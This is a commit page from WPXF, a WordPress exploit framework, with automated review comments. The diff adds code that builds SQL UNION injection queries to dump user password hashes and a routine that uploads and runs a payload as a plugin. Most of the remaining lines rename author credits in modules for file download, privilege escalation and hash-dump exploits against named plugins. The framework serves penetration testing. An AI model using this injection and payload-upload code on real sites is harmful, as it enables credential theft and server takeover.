
Merge branch 'development'
rastating committed Jan 13, 2018
2 parents 50f2c83 + ce1a079 commit c496255
Showing 238 changed files with 894 additions and 482 deletions.
2 changes: 1 addition & 1 deletion VERSION
@@ -1 +1 @@
1.8
1.8.1
23 changes: 19 additions & 4 deletions lib/wpxf/wordpress/hash_dump.rb
Expand Up @@ -29,9 +29,14 @@ def reveals_one_row_per_request
false
end

# @return [Array] an array of values to use in the generated union statement.
def hashdump_custom_union_values
[]
end

# @return [String] a unique SQL select statement that can be used to extract the hashes.
def hashdump_sql_statement
cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
cols = hashdump_union_cols
cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{eof_token})"

query = "select #{cols.join(',')} from #{table_prefix}users"
Expand All @@ -40,9 +45,9 @@ def hashdump_sql_statement
"#{query} limit #{current_row},1"
end

# @return [String] a unique SEL select statement that can be used to fingerprint the database prefix.
# @return [String] a unique select statement that can be used to fingerprint the database prefix.
def hashdump_prefix_fingerprint_statement
cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
cols = hashdump_union_cols
cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,table_name,0x3a,#{eof_token})"

query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
Expand Down Expand Up @@ -100,7 +105,7 @@ def run

@current_row = 0
emit_info 'Dumping user hashes...'
hashes = dump_and_parse_hashes
hashes = dump_and_parse_hashes.uniq
output_hashdump_table(hashes)

export_hashes(hashes) if export_path
Expand All @@ -109,6 +114,16 @@ def run

private

def hashdump_union_cols
cols = Array.new(hashdump_number_of_cols) { |_i| '0' }

hashdump_custom_union_values.each_with_index do |value, index|
cols[index] = value unless value.nil?
end

cols
end

def bof_token
@bof_token
end
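Review bot: `hashdump_union_cols` writes `cols[index] = value` for every position in `hashdump_custom_union_values` without comparing the index against `hashdump_number_of_cols`, so a module that returns more custom values than columns silently grows the array and the generated union no longer matches the column count of the first select. A guard such as `cols[index] = value unless value.nil? || index >= cols.size` keeps the statement well-formed; raising `ArgumentError` instead would surface the module bug earlier. Both callers in this section (`hashdump_sql_statement` and `hashdump_prefix_fingerprint_statement`) also assign `cols[hashdump_visible_field_index]` after the helper returns, so a custom value at that index is always overwritten; the YARD comment on `hashdump_custom_union_values` could state this, e.g. `# The value at hashdump_visible_field_index is always replaced by the concat() expression.`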
31 changes: 26 additions & 5 deletions lib/wpxf/wordpress/plugin.rb
Expand Up @@ -7,9 +7,12 @@ module Wpxf::WordPress::Plugin
# @return [String, nil] the nonce, nil on error.
def wordpress_plugin_upload_nonce(cookie)
res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
if res && res.code == 200

if res&.code == 200
return res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
end

nil
end

# Create and upload a plugin that encapsulates the current payload.
Expand All @@ -22,11 +25,29 @@ def wordpress_upload_payload_plugin(name, payload_name, cookie)
return false if nonce.nil?

res = wordpress_upload_plugin(name, payload_name, cookie, nonce)
if res && res.code == 200
return true
else
return false
res&.code == 200
end

# Upload and execute a payload as a plugin.
# @param plugin_name [String] the name of the plugin.
# @param payload_name [String] the name the payload should use on the server.
# @param cookie [String] a valid admin session cookie.
# @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the request.
def wordpress_upload_and_execute_payload_plugin(plugin_name, payload_name, cookie)
unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
emit_error 'Failed to upload the payload'
return nil
end

payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
emit_info "Executing the payload at #{payload_url}..."
res = execute_get_request(url: payload_url)

if res&.code == 200 && !res.body.strip.empty?
emit_success "Result: #{res.body}"
end

res
end

# Generate a valid WordPress plugin header / base file.
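Review bot: `wordpress_upload_and_execute_payload_plugin` reports only the success path: when the GET to `payload_url` returns a non-200 status or an empty body, nothing is emitted and the raw `res` is returned, so a caller that ignores the return value sees "Executing the payload at ..." followed by silence. An `else` branch on the `if res&.code == 200 && !res.body.strip.empty?` check, e.g. `emit_error "Payload request returned no result (status: #{res&.code.inspect})"`, makes the failure visible in the module output. The condition also assumes `body` is never nil on a 200 response; if the HTTP layer can return a nil body, `res.body.to_s.strip.empty?` avoids a `NoMethodError` there — confirm against `execute_get_request`.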
5 changes: 5 additions & 0 deletions lib/wpxf/wordpress/urls.rb
Expand Up @@ -123,4 +123,9 @@ def wordpress_url_rest_api
def wordpress_url_comments_post
normalize_uri(full_uri, 'wp-comments-post.php')
end

# @return [String] the admin / plugin options URL.
def wordpress_url_admin_options
normalize_uri(wordpress_url_admin, 'admin.php')
end
end
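Review bot: The YARD comment on `wordpress_url_admin_options` describes the result as "the admin / plugin options URL", but the method returns the bare `admin.php` URL with no query string, so the name promises more than the value delivers; presumably callers append a `page=` parameter to reach a specific options page. Stating that explicitly avoids misuse: `# @return [String] the URL of admin.php; callers append a page parameter to reach a specific plugin options page.` The enclosing module starts outside the hunk.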
2 changes: 1 addition & 1 deletion modules/auxiliary/ad_widget_php_file_download.rb
Expand Up @@ -9,7 +9,7 @@ def initialize
update_info(
name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
author: [
'Rob Carr <rob[at]rastating.com>' # WPXF module
'rastating' # WPXF module
],
references: [
['WPVDB', '8789']
4 changes: 2 additions & 2 deletions modules/auxiliary/all_in_one_migration_export.rb
Expand Up @@ -14,8 +14,8 @@ def initialize
All-in-One Migration plugin in versions < 2.0.5.
),
author: [
'James Golovich', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'James Golovich', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '7857'],
4 changes: 2 additions & 2 deletions modules/auxiliary/antioch_arbitrary_file_download.rb
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Antioch Theme Arbitrary File Download',
author: [
'Ashiyane Digital Security Team', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Ashiyane Digital Security Team', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8406']
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Candidate Application Form Arbitrary File Download',
author: [
'Larry W. Cashdollar', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Larry W. Cashdollar', # Disclosure
'rastating' # WPXF module
],
references: [
['EDB', '37754']
4 changes: 2 additions & 2 deletions modules/auxiliary/cp_image_store_arbitrary_file_download.rb
Expand Up @@ -14,8 +14,8 @@ def initialize
file accessible by the user the web server is running as.
),
author: [
'Joaquin Ramirez Martinez', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Joaquin Ramirez Martinez', # Disclosure
'rastating' # WPXF module
],
references: [
['EDB', '37559']
Expand Up @@ -13,8 +13,8 @@ def initialize
'5.1.0.3, allows unauthenticated users to create new admin users '\
'due to lack of validation when uploading SQL files.',
author: [
'Marc-Alexandre Montpas', # Vulnerability discovery
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Marc-Alexandre Montpas', # Vulnerability discovery
'rastating' # WPXF module
],
references: [
['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Direct Download for WooCommerce <= 1.15 File Download',
author: [
'Diego Celdran Morell', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Diego Celdran Morell', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8724']
Expand Up @@ -12,8 +12,8 @@ def initialize
'allows authenticated users to escalate their user role to '\
'that of an administrator.',
author: [
'James Golovich', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'James Golovich', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8365'],
Expand Up @@ -16,8 +16,8 @@ def initialize
'versions < 2.8.3 of the Download Manager plugin to get '\
'the directory listing of the specified directory.',
author: [
'James Golovich', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'James Golovich', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8365'],
4 changes: 2 additions & 2 deletions modules/auxiliary/download_manager_privilege_escalation.rb
Expand Up @@ -15,8 +15,8 @@ def initialize
'allows unauthenticated users to create new admin users '\
'due to lack of validation wpdm_ajax_call_exec.',
author: [
'Mickael Nadeau', # Vulnerability discovery
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Mickael Nadeau', # Vulnerability discovery
'rastating' # WPXF module
],
references: [
['EDB', '35533'],
4 changes: 2 additions & 2 deletions modules/auxiliary/download_monitor_log_export.rb
Expand Up @@ -15,8 +15,8 @@ def initialize
includes: Download ID, Version ID, Filename, User ID, User Login, User Email, User IP, User Agent, Date, Status
),
author: [
'James Golovich', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'James Golovich', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8810']
4 changes: 2 additions & 2 deletions modules/auxiliary/duplicator_csrf_db_export.rb
Expand Up @@ -15,8 +15,8 @@ def initialize
visits the generated web page.
),
author: [
'RatioSec Research', # Discovery and disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'RatioSec Research', # Discovery and disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8388'],
2 changes: 1 addition & 1 deletion modules/auxiliary/easy_cart_privilege_escalation.rb
Expand Up @@ -22,7 +22,7 @@ def initialize
'a new account with admin privileges via the default registration '\
'page found at /wp-login.php?action=register.',
author: [
'Rob Carr <rob[at]rastating.com>' # Discovery and WPXF module
'rastating' # Discovery and WPXF module
],
references: [
['CVE', '2015-2673'],
4 changes: 2 additions & 2 deletions modules/auxiliary/email_users_csrf_bulk_mail.rb
Expand Up @@ -12,8 +12,8 @@ def initialize
'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
'all users of a specified role.',
author: [
'Julien Rentrop', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Julien Rentrop', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8601'],
4 changes: 2 additions & 2 deletions modules/auxiliary/events_hash_dump.rb
Expand Up @@ -15,8 +15,8 @@ def initialize
to dump the hashed passwords of all users in the database.
),
author: [
'Lenon Leite', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Lenon Leite', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8954'],
4 changes: 2 additions & 2 deletions modules/auxiliary/gallery_album_hash_dump.rb
Expand Up @@ -15,8 +15,8 @@ def initialize
to dump the hashed passwords of all users in the database.
),
author: [
'Manuel Garcia Cardenas', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Manuel Garcia Cardenas', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8907'],
4 changes: 2 additions & 2 deletions modules/auxiliary/ghost_unrestricted_export_download.rb
Expand Up @@ -12,8 +12,8 @@ def initialize
'<= 0.5.5 of the Ghost plugin to download an export of the WordPress '\
'data, including usernames and e-mail addresses.',
author: [
'Josh Brody', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Josh Brody', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8479']
Expand Up @@ -14,8 +14,8 @@ def initialize
file accessible by the user the web server is running as.
),
author: [
'Kuroi\'SH', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Kuroi\'SH', # Disclosure
'rastating' # WPXF module
],
references: [
['EDB', '37254']
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'IMDb Profile Widget <= 1.0.8 Arbitrary File Download',
author: [
'CrashBandicot @DosPerl', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'CrashBandicot @DosPerl', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8426'],
4 changes: 2 additions & 2 deletions modules/auxiliary/jtrt_responsive_tables_hash_dump.rb
Expand Up @@ -16,8 +16,8 @@ def initialize
of all users in the database.
),
author: [
'Lenon Leite', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Lenon Leite', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8953'],
4 changes: 2 additions & 2 deletions modules/auxiliary/long_password_dos.rb
Expand Up @@ -16,9 +16,9 @@ def initialize
'of service via a long password that is improperly handled during '\
'hashing.',
author: [
'Javier Nieto Arevalo', # Vulnerability disclosure
'Javier Nieto Arevalo', # Vulnerability disclosure
'Andres Rojas Guerrero', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'rastating' # WPXF module
],
references: [
['CVE', '2014-9034'],
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Mail Masta Unauthenticated Local File Inclusion',
author: [
'Guillermo Garcia Marcos', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Guillermo Garcia Marcos', # Disclosure
'rastating' # WPXF module
],
desc: 'This module exploits a vulnerability which allows you to include any arbitrary file '\
'accessible by the user the web server is running as into the executing script.',
Expand Up @@ -14,8 +14,8 @@ def initialize
in order to bypass mitigation within the plugin.
),
author: [
'Larry W. Cashdollar', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Larry W. Cashdollar', # Disclosure
'rastating' # WPXF module
],
references: [
['CVE', '2017-1002008'],
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Memphis Documents Library <= 3.1.5 Arbitrary File Download',
author: [
'Felipe Molina', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Felipe Molina', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8419']
4 changes: 2 additions & 2 deletions modules/auxiliary/platform_privilege_escalation.rb
Expand Up @@ -21,8 +21,8 @@ def initialize
'privileges via the default registration page found at '\
'/wp-login.php?action=register.',
author: [
'Marc-Alexandre Montpas', # Vulnerability discovery
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Marc-Alexandre Montpas', # Vulnerability discovery
'rastating' # WPXF module
],
references: [
['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
4 changes: 2 additions & 2 deletions modules/auxiliary/post_grid_file_deletion.rb
Expand Up @@ -12,8 +12,8 @@ def initialize
'the Post Grid plugin which allows you to delete any arbitrary '\
'file accessible by the user the web server is running as.',
author: [
'White Fir Design', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'White Fir Design', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8667'],

0 comments on commit c496255
